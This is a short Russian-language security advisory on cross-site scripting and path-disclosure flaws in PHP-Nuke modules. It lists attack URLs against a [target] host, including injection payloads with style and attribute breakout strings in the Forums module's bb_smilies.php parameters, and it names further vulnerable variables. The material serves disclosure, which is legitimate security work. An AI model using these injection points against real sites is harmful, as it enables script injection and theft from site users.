Межсайтовый скриптинг и раскрытие пути в PHPNuke

if (!eregi("modules.php", $PHP_SELF)) {
    die ("You can't access this file directly...");
}
---------------------------------------------------

------------------------------------
if (eregi("footer.php",$PHP_SELF)) {
    Header("Location: index.php");
    die();
}

1. Раскрытие пути

   http://[target]/modules/Downloads/voteinclude.php
   http://[target]/modules/Your_Account/navbar.php
   http://[target]/modules/Forums/attachment.php
   http://[target]/modules/Forums/auth.php
   http://[target]/modules/News/comments.php
   http://[target]/modules/Private_Messages/functions.php
   http://[target]/modules/Private_Messages/index.php
   http://[target]/modules/Private_Messages/read.php
   http://[target]/modules/Private_Messages/reply.php
   http://[target]/modules/Web_Links/voteinclude.php
   http://[target]/modules/WebMail/contactbook.php?user=1
   

2. Раскрытие пути и межсайтовый скриптинг

   http://[target]/modules/Forums/bb_smilies.php?name=[SCRIPT]
   или http://[target]/modules/Forums/bb_smilies.php?Default_Theme=[SCRIPT]
   или http://[target]/modules/Forums/bb_smilies.php?site_font=}--></style>[SCRIPT]
   или http://[target]/modules/Forums/bb_smilies.php?bgcolor1=">[SCRIPT]
   или с :
   $sitename
   $table_width
   $color1
   $forumver
   
   - /modules/Forums/bbcode_ref.php с:
   $name
   $Default_Theme
   $site_font
   $sitename
   $bgcolor2
   $textcolor1
   $bgcolor1
   $forumver
   
   - /modules/Forums/editpost.php, /modules/Forums/newtopic.php, 
   /modules/Forums/reply.php, /modules/Forums/topicadmin.php, 
   /modules/Forums/viewforum.php с :
   $name
   
   - /modules/Forums/searchbb.php с :
   $name
   $bgcolor3
   $bgcolor1